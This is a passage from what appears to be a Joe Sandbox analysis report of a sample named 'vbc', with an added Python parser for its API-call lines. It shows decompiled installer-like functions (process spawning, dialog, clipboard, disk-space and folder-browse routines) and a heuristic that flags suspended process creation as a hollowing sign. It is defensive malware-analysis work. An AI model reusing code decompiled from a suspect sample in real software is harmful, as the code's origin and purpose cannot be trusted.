			// and closes the thread handle; E00406AE6 polls WaitForSingleObject with a 100 ms
			// timeout and reads GetExitCodeProcess; E004065B5 formats the exit code with
			// wsprintfW; E004056D0 writes a status line to the dialog (lstrlenW/lstrcatW/
			// SetWindowTextW/SendMessageW). The global at 0x7a8b28 accumulates the error flag
			// kept in the stack slot [_t22 - 4].
			// Quality 78%: the decompiler did not recover declarations for _t7 and _t19, and
			// _t15 is the value every result is compared against (it behaves as 0 / NULL).
			E00401FA4() {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);                        // argument for the child (E00402DA6 is not resolved in this report)
				E004056D0(0xffffffeb, _t7);                    // status-line update
				_t9 = E00405C51(_t19); // executed              // CreateProcessW wrapper; returns the process handle
				_t20 = _t9;
				if(_t20 == _t15) {                             // process creation failed
					 *((intOrPtr*)(_t22 - 4)) = 1;             // set the error flag
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) { // caller asked to wait for the child
						_t13 = E00406AE6(_t17, _t20); // executed // wait and fetch the exit code
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {                 // non-zero exit code counts as an error
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065B5( *((intOrPtr*)(_t22 - 0xc)), _t13); // otherwise store the exit code as a string
						}
					}
					_push(_t20);
					CloseHandle();                             // release the process handle
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

Instruction addresses (the disassembly columns were not captured in this extract; the function body is split across non-contiguous ranges): 0x00401faa, 0x00401faf, 0x00401fb5, 0x00401fba, 0x00401fbe, 0x0040292e, 0x00401fc4, 0x00401fc7, 0x00401fca, 0x00401fd2, 0x00401fe1, 0x00401fe3, 0x00401fd4, 0x00401fd8, 0x00401fea, 0x00401feb, 0x00402c2d, 0x00402c39

                                                        APIs
                                                          • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                                                          • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                                                          • Part of subcall function 004056D0: lstrcatW.KERNEL32 ref: 0040572B
                                                          • Part of subcall function 004056D0: SetWindowTextW.USER32 ref: 0040573D
                                                          • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                                                          • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                                                          • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                                                          • Part of subcall function 00405C51: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F90,00000000), ref: 00405C7A
                                                          • Part of subcall function 00405C51: CloseHandle.KERNEL32(?), ref: 00405C87
                                                        • CloseHandle.KERNEL32(?), ref: 00401FEB
                                                          • Part of subcall function 00406AE6: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
                                                          • Part of subcall function 00406AE6: GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19
                                                          • Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2
                                                        Memory Dump Source
• Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                        • String ID:
                                                        • API String ID: 2972824698-0
                                                        • Opcode ID: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
                                                        • Instruction ID: 2caf0deb9ca9c7db124b05ee4a2ba4d84aa6555efd1b03c2e112275a9e200b7a
                                                        • Opcode Fuzzy Hash: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
                                                        • Instruction Fuzzy Hash: FCF09671904111E7DB11BBA59A88E9E76A4DF01318F25443BE102B21D0D77C4D419A6E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%
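The "APIs" lists attached to each decompiled function ("Name.Module(args), ref: address", with a "Part of subcall function" prefix for calls made from callees) are the fastest way to read behaviour out of a record: for E00401FA4 they resolve to CreateProcessW, then WaitForSingleObject, then GetExitCodeProcess, i.e. spawn a child and wait for its exit. The following is an added example, not part of the Joe Sandbox report or its tooling, that parses those lines and checks for an ordered API subsequence. The line format is taken from this page; the sample input is copied from the E00401FA4 record above; the dwCreationFlags decoding assumes the sandbox prints arguments in call order (the sixth CreateProcessW argument), and values printed as "?" are treated as unknown.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Sequence

# One "APIs" line as printed in a Joe Sandbox function record, e.g.
#   • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000), ref: 00405708
#   • CloseHandle.KERNEL32(?), ref: 00401FEB
#   • SetWindowTextW.USER32 ref: 0040573D          (no argument list printed)
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiRef:
    api: str
    module: str
    args: List[str]          # raw stack values as printed; "?" means the sandbox could not read it
    ref: int                 # address of the call instruction
    subcall: Optional[int]   # decompiled callee the call belongs to, None if made directly


def parse_api_lines(text: str) -> List[ApiRef]:
    """Parse every API reference line in `text`; non-matching lines are skipped."""
    refs = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        refs.append(ApiRef(m["api"], m["mod"], args, int(m["ref"], 16),
                           int(m["sub"], 16) if m["sub"] else None))
    return refs


def has_ordered_calls(refs: Sequence[ApiRef], wanted: Sequence[str]) -> bool:
    """True if the API names in `wanted` appear in that relative order (gaps allowed)."""
    names = iter(r.api for r in refs)
    # `name in names` consumes the iterator up to the match, so order is enforced.
    return all(name in names for name in wanted)


# dwCreationFlags bits of CreateProcess (Win32 SDK values); CREATE_SUSPENDED is the one
# worth flagging, since it is the usual first step of process hollowing.
CREATION_FLAGS = {
    0x00000004: "CREATE_SUSPENDED",
    0x00000008: "DETACHED_PROCESS",
    0x00000010: "CREATE_NEW_CONSOLE",
    0x04000000: "CREATE_DEFAULT_ERROR_MODE",
    0x08000000: "CREATE_NO_WINDOW",
}


def creation_flags(ref: ApiRef) -> List[str]:
    """Decode dwCreationFlags (6th argument) of a CreateProcessA/W reference.
    Assumption: the sandbox prints arguments in call order. Unknown ("?") -> []."""
    if not ref.api.startswith("CreateProcess") or len(ref.args) < 6 or ref.args[5] == "?":
        return []
    value = int(ref.args[5], 16)
    return [name for bit, name in sorted(CREATION_FLAGS.items()) if value & bit]


# Constructed sample: the APIs list of E00401FA4 copied from this report.
SAMPLE = """\
• Part of subcall function 00405C51: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F90,00000000), ref: 00405C7A
• Part of subcall function 00405C51: CloseHandle.KERNEL32(?), ref: 00405C87
• CloseHandle.KERNEL32(?), ref: 00401FEB
• Part of subcall function 00406AE6: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
• Part of subcall function 00406AE6: GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19
• Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2
"""

SPAWN_AND_WAIT = ["CreateProcessW", "WaitForSingleObject", "GetExitCodeProcess"]

if __name__ == "__main__":
    refs = parse_api_lines(SAMPLE)
    for r in refs:
        print(f"{r.ref:08X} {r.api}.{r.module} args={len(r.args)} via={r.subcall}")
    print("spawn-and-wait:", has_ordered_calls(refs, SPAWN_AND_WAIT))
    print("CreateProcessW flags:", creation_flags(refs[0]))
```

The argument values come from the sandbox's stack snapshot at the time of the call, so stale or unreadable slots print as "?"; the decoder deliberately returns nothing for those rather than guessing. The 100 ms (0x64) second argument of WaitForSingleObject in the sample is the poll interval used by E00406AE6.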

                                                        C-Code - Quality: 95%
                                                        			E0040580F(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                        				struct HWND__* _v8;
                                                        				long _v12;
                                                        				struct tagRECT _v28;
                                                        				void* _v36;
                                                        				signed int _v40;
                                                        				int _v44;
                                                        				int _v48;
                                                        				signed int _v52;
                                                        				int _v56;
                                                        				void* _v60;
                                                        				void* _v68;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				struct HWND__* _t94;
                                                        				long _t95;
                                                        				int _t100;
                                                        				void* _t108;
                                                        				intOrPtr _t130;
                                                        				struct HWND__* _t134;
                                                        				int _t156;
                                                        				int _t159;
                                                        				struct HMENU__* _t164;
                                                        				struct HWND__* _t168;
                                                        				struct HWND__* _t169;
                                                        				int _t171;
                                                        				void* _t172;
                                                        				short* _t173;
                                                        				short* _t175;
                                                        				int _t177;
                                                        
                                                        				_t169 =  *0x7a7a84;
                                                        				_t156 = 0;
                                                        				_v8 = _t169;
                                                        				if(_a8 != 0x110) {
                                                        					if(_a8 == 0x405) {
                                                        						CloseHandle(CreateThread(0, 0, E004057A3, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                                        					}
                                                        					if(_a8 != 0x111) {
                                                        						L17:
                                                        						_t171 = 1;
                                                        						if(_a8 != 0x404) {
                                                        							L25:
                                                        							if(_a8 != 0x7b) {
                                                        								goto L20;
                                                        							}
                                                        							_t94 = _v8;
                                                        							if(_a12 != _t94) {
                                                        								goto L20;
                                                        							}
                                                        							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                        							_a8 = _t95;
                                                        							if(_t95 <= _t156) {
                                                        								L36:
                                                        								return 0;
                                                        							}
                                                        							_t164 = CreatePopupMenu();
                                                        							AppendMenuW(_t164, _t156, _t171, E004066AB(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                        							_t100 = _a16;
                                                        							_t159 = _a16 >> 0x10;
                                                        							if(_a16 == 0xffffffff) {
                                                        								GetWindowRect(_v8,  &_v28);
                                                        								_t100 = _v28.left;
                                                        								_t159 = _v28.top;
                                                        							}
                                                        							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                        								_v60 = _t156;
                                                        								_v48 = 0x7a1f88;
                                                        								_v44 = 0x1000;
                                                        								_a4 = _a8;
                                                        								do {
                                                        									_a4 = _a4 - 1;
                                                        									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                        								} while (_a4 != _t156);
                                                        								OpenClipboard(_t156);
                                                        								EmptyClipboard();
                                                        								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                        								_a4 = _t108;
                                                        								_t172 = GlobalLock(_t108);
                                                        								do {
                                                        									_v48 = _t172;
                                                        									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                        									 *_t173 = 0xd;
                                                        									_t175 = _t173 + 2;
                                                        									 *_t175 = 0xa;
                                                        									_t172 = _t175 + 2;
                                                        									_t156 = _t156 + 1;
                                                        								} while (_t156 < _a8);
                                                        								GlobalUnlock(_a4);
                                                        								SetClipboardData(0xd, _a4);
                                                        								CloseClipboard();
                                                        							}
                                                        							goto L36;
                                                        						}
                                                        						if( *0x7a7a6c == _t156) {
                                                        							ShowWindow( *0x7a8aa8, 8);
                                                        							if( *0x7a8b2c == _t156) {
                                                        								E004056D0( *((intOrPtr*)( *0x7a0f60 + 0x34)), _t156);
                                                        							}
                                                        							E004045A3(_t171);
                                                        							goto L25;
                                                        						}
                                                        						 *0x7a0758 = 2;
                                                        						E004045A3(0x78);
                                                        						goto L20;
                                                        					} else {
                                                        						if(_a12 != 0x403) {
                                                        							L20:
                                                        							return E00404631(_a8, _a12, _a16);
                                                        						}
                                                        						ShowWindow( *0x7a7a70, _t156);
                                                        						ShowWindow(_t169, 8);
                                                        						E004045FF(_t169);
                                                        						goto L17;
                                                        					}
                                                        				}
                                                        				_v52 = _v52 | 0xffffffff;
                                                        				_v40 = _v40 | 0xffffffff;
                                                        				_t177 = 2;
                                                        				_v60 = _t177;
                                                        				_v56 = 0;
                                                        				_v48 = 0;
                                                        				_v44 = 0;
                                                        				asm("stosd");
                                                        				asm("stosd");
                                                        				_t130 =  *0x7a8ab0;
                                                        				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                        				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                        				 *0x7a7a70 = GetDlgItem(_a4, 0x403);
                                                        				 *0x7a7a68 = GetDlgItem(_a4, 0x3ee);
                                                        				_t134 = GetDlgItem(_a4, 0x3f8);
                                                        				 *0x7a7a84 = _t134;
                                                        				_v8 = _t134;
                                                        				E004045FF( *0x7a7a70);
                                                        				 *0x7a7a74 = E00404F58(4);
                                                        				 *0x7a7a8c = 0;
                                                        				GetClientRect(_v8,  &_v28);
                                                        				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                        				SendMessageW(_v8, 0x1061, 0,  &_v60);
                                                        				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                                                        				if(_a8 >= 0) {
                                                        					SendMessageW(_v8, 0x1001, 0, _a8);
                                                        					SendMessageW(_v8, 0x1026, 0, _a8);
                                                        				}
                                                        				if(_a12 >= _t156) {
                                                        					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                        				}
                                                        				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                        				_push(0x1b);
                                                        				E004045CA(_a4);
                                                        				if(( *0x7a8ab8 & 0x00000003) != 0) {
                                                        					ShowWindow( *0x7a7a70, _t156);
                                                        					if(( *0x7a8ab8 & 0x00000002) != 0) {
                                                        						 *0x7a7a70 = _t156;
                                                        					} else {
                                                        						ShowWindow(_v8, 8);
                                                        					}
                                                        					E004045FF( *0x7a7a68);
                                                        				}
                                                        				_t168 = GetDlgItem(_a4, 0x3ec);
                                                        				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                        				if(( *0x7a8ab8 & 0x00000004) != 0) {
                                                        					SendMessageW(_t168, 0x409, _t156, _a12);
                                                        					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                        				}
                                                        				goto L36;
                                                        			}
                                                        Instruction addresses (address column of the listing above, one entry per decompiled line, in listing order):
                                                        0x00405817 0x0040581d 0x00405827 0x0040582a 0x004059c0 0x004059e4 0x004059e4 0x004059f7 0x00405a15 0x00405a17
                                                        0x00405a1f 0x00405a75 0x00405a79 0x00000000 0x00000000 0x00405a7b 0x00405a81 0x00000000 0x00000000 0x00405a8b
                                                        0x00405a93 0x00405a96 0x00405b98 0x00000000 0x00405b98 0x00405aa5 0x00405ab0 0x00405ab9 0x00405ac4 0x00405ac7
                                                        0x00405ad0 0x00405ad6 0x00405ad9 0x00405ad9 0x00405af1 0x00405afa 0x00405afd 0x00405b04 0x00405b0b 0x00405b13
                                                        0x00405b13 0x00405b2a 0x00405b2a 0x00405b31 0x00405b37 0x00405b43 0x00405b4a 0x00405b53 0x00405b55 0x00405b58
                                                        0x00405b67 0x00405b6a 0x00405b70 0x00405b71 0x00405b77 0x00405b78 0x00405b79 0x00405b81 0x00405b8c 0x00405b92
                                                        0x00405b92 0x00000000 0x00405af1 0x00405a27 0x00405a57 0x00405a5f 0x00405a6a 0x00405a6a 0x00405a70 0x00000000
                                                        0x00405a70 0x00405a2b 0x00405a35 0x00000000 0x004059f9 0x004059ff 0x00405a3a 0x00000000 0x00405a43 0x00405a08
                                                        0x00405a0d 0x00405a10 0x00000000 0x00405a10 0x004059f7 0x00405830 0x00405834 0x0040583c 0x00405840 0x00405843
                                                        0x00405846 0x00405849 0x0040584c 0x0040584d 0x0040584e 0x00405867 0x0040586a 0x00405874 0x00405883 0x0040588b
                                                        0x00405893 0x00405898 0x0040589b 0x004058a7 0x004058b0 0x004058b9 0x004058db 0x004058e1 0x004058f2 0x004058f7
                                                        0x00405905 0x00405913 0x00405913 0x00405918 0x00405926 0x00405926 0x0040592b 0x0040592e 0x00405933 0x0040593f
                                                        0x00405948 0x00405955 0x00405964 0x00405957 0x0040595c 0x0040595c 0x00405970 0x00405970 0x00405984 0x0040598d
                                                        0x00405996 0x004059a6 0x004059b2 0x004059b2 0x00000000

                                                        APIs
                                                        • GetDlgItem.USER32(?,00000403), ref: 0040586D
                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040587C
                                                        • GetClientRect.USER32 ref: 004058B9
                                                        • GetSystemMetrics.USER32 ref: 004058C0
                                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058E1
                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058F2
                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405905
                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405913
                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405926
                                                        • ShowWindow.USER32(00000000,?), ref: 00405948
                                                        • ShowWindow.USER32(?,00000008), ref: 0040595C
                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040597D
                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040598D
                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A6
                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059B2
                                                        • GetDlgItem.USER32(?,000003F8), ref: 0040588B
                                                          • Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D
                                                        • GetDlgItem.USER32(?,000003EC), ref: 004059CF
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_000057A3,00000000), ref: 004059DD
                                                        • CloseHandle.KERNEL32(00000000), ref: 004059E4
                                                        • ShowWindow.USER32(00000000), ref: 00405A08
                                                        • ShowWindow.USER32(?,00000008), ref: 00405A0D
                                                        • ShowWindow.USER32(00000008), ref: 00405A57
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A8B
                                                        • CreatePopupMenu.USER32 ref: 00405A9C
                                                        • AppendMenuW.USER32 ref: 00405AB0
                                                        • GetWindowRect.USER32(?,?), ref: 00405AD0
                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE9
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B21
                                                        • OpenClipboard.USER32(00000000), ref: 00405B31
                                                        • EmptyClipboard.USER32 ref: 00405B37
                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B43
                                                        • GlobalLock.KERNEL32 ref: 00405B4D
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B61
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405B81
                                                        • SetClipboardData.USER32 ref: 00405B8C
                                                        • CloseClipboard.USER32 ref: 00405B92
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                        • String ID: {
                                                        • API String ID: 590372296-366298937
                                                        • Opcode ID: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
                                                        • Instruction ID: f3bb878df23a29f955279a02cf148875578f9ab87112c8cbe183df0a3e5e7c84
                                                        • Opcode Fuzzy Hash: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
                                                        • Instruction Fuzzy Hash: 7DB16BB1900608FFDF119F64DD89AAE7B79FB45354F00802AFA41BA1A0CB785E51DF68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 78%
                                                        			E00404ABB(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                        				signed int _v8;
                                                        				signed int _v12;
                                                        				long _v16;
                                                        				long _v20;
                                                        				long _v24;
                                                        				char _v28;
                                                        				intOrPtr _v32;
                                                        				long _v36;
                                                        				char _v40;
                                                        				unsigned int _v44;
                                                        				signed int _v48;
                                                        				WCHAR* _v56;
                                                        				intOrPtr _v60;
                                                        				intOrPtr _v64;
                                                        				intOrPtr _v68;
                                                        				WCHAR* _v72;
                                                        				void _v76;
                                                        				struct HWND__* _v80;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				intOrPtr _t82;
                                                        				long _t87;
                                                        				short* _t89;
                                                        				void* _t95;
                                                        				signed int _t96;
                                                        				int _t109;
                                                        				signed short _t114;
                                                        				signed int _t118;
                                                        				struct HWND__** _t122;
                                                        				intOrPtr* _t138;
                                                        				WCHAR* _t146;
                                                        				unsigned int _t150;
                                                        				signed int _t152;
                                                        				unsigned int _t156;
                                                        				signed int _t158;
                                                        				signed int* _t159;
                                                        				signed int* _t160;
                                                        				struct HWND__* _t166;
                                                        				struct HWND__* _t167;
                                                        				int _t169;
                                                        				unsigned int _t197;
                                                        
                                                        				_t156 = __edx;
                                                        				_t82 =  *0x7a0f60;
                                                        				_v32 = _t82;
                                                        				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x7a9000;
                                                        				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                        				if(_a8 == 0x40b) {
                                                        					E00405CB2(0x3fb, _t146);
                                                        					E004068F5(_t146);
                                                        				}
                                                        				_t167 = _a4;
                                                        				if(_a8 != 0x110) {
                                                        					L8:
                                                        					if(_a8 != 0x111) {
                                                        						L20:
                                                        						if(_a8 == 0x40f) {
                                                        							L22:
                                                        							_v8 = _v8 & 0x00000000;
                                                        							_v12 = _v12 & 0x00000000;
                                                        							E00405CB2(0x3fb, _t146);
                                                        							if(E00406045(_t186, _t146) == 0) {
                                                        								_v8 = 1;
                                                        							}
                                                        							E0040666E(0x79ff58, _t146);
                                                        							_t87 = E00406A3B(1);
                                                        							_v16 = _t87;
                                                        							if(_t87 == 0) {
                                                        								L30:
                                                        								E0040666E(0x79ff58, _t146);
                                                        								_t89 = E00405FE8(0x79ff58);
                                                        								_t158 = 0;
                                                        								if(_t89 != 0) {
                                                        									 *_t89 = 0;
                                                        								}
                                                        								if(GetDiskFreeSpaceW(0x79ff58,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                        									goto L35;
                                                        								} else {
                                                        									_t169 = 0x400;
                                                        									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                        									asm("cdq");
                                                        									_v48 = _t109;
                                                        									_v44 = _t156;
                                                        									_v12 = 1;
                                                        									goto L36;
                                                        								}
                                                        							} else {
                                                        								_t159 = 0;
                                                        								if(0 == 0x79ff58) {
                                                        									goto L30;
                                                        								} else {
                                                        									goto L26;
                                                        								}
                                                        								while(1) {
                                                        									L26:
                                                        									_t114 = _v16(0x79ff58,  &_v48,  &_v28,  &_v40);
                                                        									if(_t114 != 0) {
                                                        										break;
                                                        									}
                                                        									if(_t159 != 0) {
                                                        										 *_t159 =  *_t159 & _t114;
                                                        									}
                                                        									_t160 = E00405F89(0x79ff58);
                                                        									 *_t160 =  *_t160 & 0x00000000;
                                                        									_t159 = _t160;
                                                        									 *_t159 = 0x5c;
                                                        									if(_t159 != 0x79ff58) {
                                                        										continue;
                                                        									} else {
                                                        										goto L30;
                                                        									}
                                                        								}
                                                        								_t150 = _v44;
                                                        								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                        								_v44 = _t150 >> 0xa;
                                                        								_v12 = 1;
                                                        								_t158 = 0;
                                                        								__eflags = 0;
                                                        								L35:
                                                        								_t169 = 0x400;
                                                        								L36:
                                                        								_t95 = E00404F58(5);
                                                        								if(_v12 != _t158) {
                                                        									_t197 = _v44;
                                                        									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                        										_v8 = 2;
                                                        									}
                                                        								}
                                                        								if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != _t158) {
                                                        									E00404F40(0x3ff, 0xfffffffb, _t95);
                                                        									if(_v12 == _t158) {
                                                        										SetDlgItemTextW(_a4, _t169, 0x79ff48);
                                                        									} else {
                                                        										E00404E77(_t169, 0xfffffffc, _v48, _v44);
                                                        									}
                                                        								}
                                                        								_t96 = _v8;
                                                        								 *0x7a8b44 = _t96;
                                                        								if(_t96 == _t158) {
                                                        									_v8 = E0040140B(7);
                                                        								}
                                                        								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                        									_v8 = _t158;
                                                        								}
                                                        								E004045EC(0 | _v8 == _t158);
                                                        								if(_v8 == _t158 &&  *0x7a1f78 == _t158) {
                                                        									E00404A14();
                                                        								}
                                                        								 *0x7a1f78 = _t158;
                                                        								goto L53;
                                                        							}
                                                        						}
                                                        						_t186 = _a8 - 0x405;
                                                        						if(_a8 != 0x405) {
                                                        							goto L53;
                                                        						}
                                                        						goto L22;
                                                        					}
                                                        					_t118 = _a12 & 0x0000ffff;
                                                        					if(_t118 != 0x3fb) {
                                                        						L12:
                                                        						if(_t118 == 0x3e9) {
                                                        							_t152 = 7;
                                                        							memset( &_v76, 0, _t152 << 2);
                                                        							_v80 = _t167;
                                                        							_v72 = 0x7a1f88;
                                                        							_v60 = E00404E11;
                                                        							_v56 = _t146;
                                                        							_v68 = E004066AB(_t146, 0x7a1f88, _t167, 0x7a0760, _v12);
                                                        							_t122 =  &_v80;
                                                        							_v64 = 0x41;
                                                        							__imp__SHBrowseForFolderW(_t122);
                                                        							if(_t122 == 0) {
                                                        								_a8 = 0x40f;
                                                        							} else {
                                                        								__imp__CoTaskMemFree(_t122);
                                                        								E00405F3D(_t146);
                                                        								_t125 =  *((intOrPtr*)( *0x7a8ab0 + 0x11c));
                                                        								if( *((intOrPtr*)( *0x7a8ab0 + 0x11c)) != 0 && _t146 == 0x7b3800) {
                                                        									E004066AB(_t146, 0x7a1f88, _t167, 0, _t125);
                                                        									if(lstrcmpiW(0x7a6a40, 0x7a1f88) != 0) {
                                                        										lstrcatW(_t146, 0x7a6a40);
                                                        									}
                                                        								}
                                                        								 *0x7a1f78 =  *0x7a1f78 + 1;
                                                        								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                        							}
                                                        						}
                                                        						goto L20;
                                                        					}
                                                        					if(_a12 >> 0x10 != 0x300) {
                                                        						goto L53;
                                                        					}
                                                        					_a8 = 0x40f;
                                                        					goto L12;
                                                        				} else {
                                                        					_t166 = GetDlgItem(_t167, 0x3fb);
                                                        					if(E00405FB4(_t146) != 0 && E00405FE8(_t146) == 0) {
                                                        						E00405F3D(_t146);
                                                        					}
                                                        					 *0x7a7a78 = _t167;
                                                        					SetWindowTextW(_t166, _t146);
                                                        					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                        					_push(1);
                                                        					E004045CA(_t167);
                                                        					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                        					_push(0x14);
                                                        					E004045CA(_t167);
                                                        					E004045FF(_t166);
                                                        					_t138 = E00406A3B(8);
                                                        					if(_t138 == 0) {
